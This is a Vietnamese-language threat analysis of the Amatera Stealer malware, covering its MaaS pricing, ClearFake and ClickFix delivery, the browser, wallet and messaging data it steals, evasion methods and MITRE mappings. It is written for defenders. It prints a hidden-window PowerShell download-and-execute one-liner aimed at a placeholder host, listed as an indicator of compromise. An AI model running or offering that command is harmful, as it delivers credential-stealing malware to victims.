Phân Tích Chiến Dịch Malware: Amatera Stealer – Một Mối Đe Dọa Đánh Cắp Thông Tin Nâng Cao
Tổng Quan
Amatera Stealer là một biến thể nâng cấp và được đổi thương hiệu từ ACR Stealer, được phát hiện vào đầu năm 2025. Malware này được phân phối dưới mô hình Malware-as-a-Service (MaaS) với các gói đăng ký từ 199 USD/tháng đến 1.499 USD/năm. Dù có nhiều mã nguồn tương đồng với ACR Stealer, Amatera Stealer được tích hợp các tính năng tiên tiến cùng cơ chế ẩn náu, khiến nó trở thành một mối đe dọa đáng kể và khác biệt.
Phương Thức Phân Phối và Vector Lây Nhiễm
Amatera Stealer chủ yếu được phân phối thông qua các chiến dịch web injection tiên tiến từ cụm ClearFake. Các trang web hợp pháp bị xâm nhập bằng cách chèn mã HTML và JavaScript độc hại. Một số kỹ thuật nổi bật trong các chiến dịch bao gồm:
- EtherHiding: Sử dụng các hợp đồng Binance Smart Chain để lưu trữ các đoạn mã độc hại.
- ClickFix: Chiến thuật social engineering, lừa người dùng thực thi lệnh thông qua các xác minh CAPTCHA giả mạo.
Người dùng bị dụ mở hộp thoại Windows Run (Windows key + R), dán các lệnh PowerShell độc hại và thực thi chúng. Điều này dẫn đến việc triển khai Amatera Stealer thông qua các loader nhiều lớp và shellcode injection.
Khả Năng Kỹ Thuật và Tính Năng
Chức Năng Của Malware
Amatera Stealer tập trung vào việc đánh cắp thông tin nhạy cảm từ các nguồn sau:
- Trình duyệt: Cookies, dữ liệu biểu mẫu web, dữ liệu hồ sơ bao gồm lịch sử web.
- Ví tiền điện tử (Crypto wallets).
- Phần mềm quản lý mật khẩu (Password managers).
- Tệp liên quan đến tiện ích mở rộng trình duyệt.
- Ứng dụng email thông dụng và phần mềm quản lý kết nối (SSH/FTP).
- Ứng dụng nhắn tin như Signal, WhatsApp, và các client XMPP.
Malware sử dụng các mẫu tìm kiếm glob-syntax để liệt kê hệ thống tệp thông qua các hàm NtCreateFile và NtQueryDirectoryFile. Ngoài ra, nó bypass App Bound Encryption trên các trình duyệt liên quan đến Chrome bằng cách inject shellcode, khiến trình duyệt sao chép các tệp nhạy cảm đến vị trí mà malware có thể truy cập.
Kỹ Thuật Thực Thi
Amatera Stealer hỗ trợ thực thi các payload phụ dựa trên các key cấu hình JSON. Dưới đây là một đoạn pseudocode minh họa logic thực thi:
if tr == 1:
execute sample using ShellExecuteA
if tr == 2:
treat payload as PowerShell command string,
run with DownloadString + Invoke-Expression (IEX)
if tr == 1 && file type is PowerShell script:
run payload using ShellExecuteA with PowerShell instead of direct execution
Kỹ Thuật Né Tránh và Duy Trì
Malware triển khai nhiều kỹ thuật chống phân tích và ẩn náu, bao gồm:
- Sử dụng WoW64 syscalls để bypass user-mode hooking.
- Ứ dụng NTSockets cho giao tiếp command-and-control (C2) một cách ẩn giấu.
- Hỗ trợ các yêu cầu HTTPS cho giao tiếp với C2, tăng cường khả năng che giấu.
Chi Tiết Hạ Tầng
Hạ tầng của Amatera Stealer bao gồm các thành phần chính sau:
- ClearFake Cluster: Các trang web hợp pháp bị xâm nhập để lưu trữ mã HTML/JavaScript độc hại được chèn vào.
- Binance Smart Chain: Được sử dụng trong kỹ thuật EtherHiding để lưu trữ các đoạn mã độc hại.
- Thực Thi Lệnh: Hộp thoại Windows Run được kích hoạt thông qua social engineering; triển khai các loader nhiều lớp và shellcode.
TTPs Liên Quan Đến MITRE ATT&CK Framework
Dù không có mã ID MITRE ATT&CK cụ thể được đề cập, các TTPs liên quan có thể bao gồm:
- Web Injection / Malicious Script Injection: T1185 (Man-in-the-Middle), T1059.001 (PowerShell).
- Sử Dụng Công Cụ Hợp Pháp / Living off the Land: T1059.001 (PowerShell), T1204.002 (User Execution: Malicious File).
- Liệt Kê Hệ Thống Tệp (File System Enumeration): T1083.
- Truy Cập Thông Tin Xác Thực Qua Dữ Liệu Trình Duyệt: T1555.
- Code Injection: T1055.
Indicators of Compromise (IOCs)
Dưới đây là các IOCs liên quan đến Amatera Stealer:
- Lệnh PowerShell quan sát được trong chuỗi lây nhiễm:
powershell.exe -nop -w hidden IEX(New-Object Net.WebClient).DownloadString('http://malicious-url')
Lưu ý: Không có thông tin cụ thể về CVE hoặc mã hash được đề cập trong các nguồn tài liệu.
Kết Luận
Amatera Stealer là một mối đe dọa nghiêm trọng với khả năng đánh cắp thông tin đa dạng và các kỹ thuật né tránh tinh vi. Các chuyên viên bảo mật, quản trị hệ thống và đội ngũ SOC cần chú ý đến các chiến dịch web injection như ClearFake, cũng như các kỹ thuật social engineering như ClickFix và EtherHiding. Việc giám sát chặt chẽ các lệnh PowerShell bất thường và cập nhật các quy tắc phát hiện trong SIEM là cần thiết để giảm thiểu nguy cơ từ malware này.
